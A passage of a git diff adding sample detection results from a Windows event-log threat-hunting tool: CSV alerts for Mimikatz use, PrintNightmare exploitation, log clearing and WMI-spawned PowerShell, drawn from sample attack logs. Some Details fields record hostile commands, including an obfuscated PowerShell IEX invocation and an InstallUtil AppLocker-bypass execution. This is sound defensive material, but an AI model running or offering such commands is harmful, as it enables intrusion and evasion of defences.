disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event 
Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 
+09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx 
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit 
policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Disabling Windows Event Auditing,,rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit 
policy disabled/ID4719-Audit policy deactivation.evtx +2021-10-27 19:09:16.280 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:12:47.151 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.229 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:12:47.323 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,302,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,849,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:21.369 +09:00,fs03vuln.offsec.lan,301,critical,Mimikatz 
Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.403 +09:00,fs03vuln.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,848,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.466 +09:00,fs03vuln.offsec.lan,5142,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,5142-Mimikatz print spool privileges requested.evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server installation (PrintNightmare).evtx" +2021-10-27 19:14:27.559 +09:00,fs03vuln.offsec.lan,300,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID316,300,301,316,823,848-Mimispool printer server 
installation (PrintNightmare).evtx" +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,high,Possible CVE-2021-1675 Print Spooler Exploitation,,rules/sigma/other/printservice/win_exploit_cve_2021_1675_printspooler.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.260 +09:00,FS03.offsec.lan,354,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:28:26.307 +09:00,FS03.offsec.lan,823,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/ID354-808-Mimispool printer installation (PrintNightmare).evtx +2021-10-27 19:34:49.837 +09:00,FS03.offsec.lan,6416,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-27 19:34:50.024 +09:00,FS03.offsec.lan,4674,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4674,6416 New external device connected (PrintNightmare).evtx" +2021-10-28 22:41:21.325 +09:00,FS03.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: ""cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\System32\spoolsv.exe",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-10-28 
22:41:21.325 +09:00,FS03.offsec.lan,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0004-Privilege Escalation/T1574-DLL side-loading/1-Print spool spawned a CMD shell (PrintNightMare).evtx +2021-11-02 23:15:23.676 +09:00,fs03vuln.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1140-Deobfuscate-Decode Files or Information/ID4688-Certutil download.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1086,technique_name=PowerShell : Command: powershell $env:I4Pzl|.(Get-C`ommand ('{1}e{0}'-f'x','i')) : Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe : User: OFFSEC\admmig : Parent Command: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Wmiprvse Spawning Process,,rules/sigma/process_creation/win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,Suspicious PowerShell Parent Process,,rules/sigma/process_creation/win_susp_powershell_parent_process.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,low,Non Interactive 
PowerShell,,rules/sigma/process_creation/win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-09 00:01:27.604 +09:00,fs03vuln.offsec.lan,1,high,WMI Spawning Windows PowerShell,,rules/sigma/process_creation/win_wmi_spwns_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID1-WMI spwaning PowerShell process - WMImplant.evtx +2021-11-18 16:40:29.566 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1059,technique_name=Command-Line Interface : Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /nologo /target:exe /out:zoom-update.exe C:\Users\pc1-user\Desktop\zoom-update.cs : Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1027.004_Obfuscated Files or Information Compile After Delivery/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,high,Process Creation Sysmon Rule Alert,"Rule: technique_id=T1218.004,technique_name=InstallUtil : Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U C:\Users\pc1-user\Desktop\zoom-update.exe : Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe : User: CYBERCAT\pc1-user : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary Proxy Execution InstallUtil/sysmon.evtx +2021-11-18 16:42:54.822 +09:00,PC-01.cybercat.local,1,low,Possible Applocker Bypass,,rules/sigma/process_creation/win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/YamatoSecurity/T1218.004_Signed Binary 
Proxy Execution InstallUtil/sysmon.evtx diff --git a/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx new file mode 100644 index 00000000..0b2d2443 Binary files /dev/null and b/sample-results/hayabusa-sample-evtx-ResultsDefaultSettings.xlsx differ diff --git a/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv new file mode 100644 index 00000000..59d94e55 --- /dev/null +++ b/sample-results/hayabusa-sample-evtx-ResultsDeprecatedAndNoisyRulesEnabled.csv 
@@ -0,0 +1,14207 @@ +Timestamp,Computer,EventID,Level,RuleTitle,Details,RulePath,FilePath +2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:17:44.109 +09:00,37L4247D28-05,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,USB Device Plugged,,rules/sigma/other/driverframeworks/win_usb_device_plugged.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:33.828 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public 
IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,medium,Local user account created,User: IEUser : 
SID:S-1-5-21-3463664321-2923530833-3546627382-1000,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx +2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,User added to local Administrators group,User: - : SID: S-1-5-21-3463664321-2923530833-3546627382-1000 : Group: Administrators,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:40.005 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x298c5 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: WIN-QALA5Q3KJ43 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x29908 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser : LogonID: 0x298c5,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:23:39.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.130 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 01:24:53.630 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate 
Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:27:48.911 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:28:54.348 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 01:32:51.504 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:05:04.489 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser : LogonID: 0x29908,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2013-10-24 02:27:37.645 +09:00,IE8Win7,21,high,WMI Event 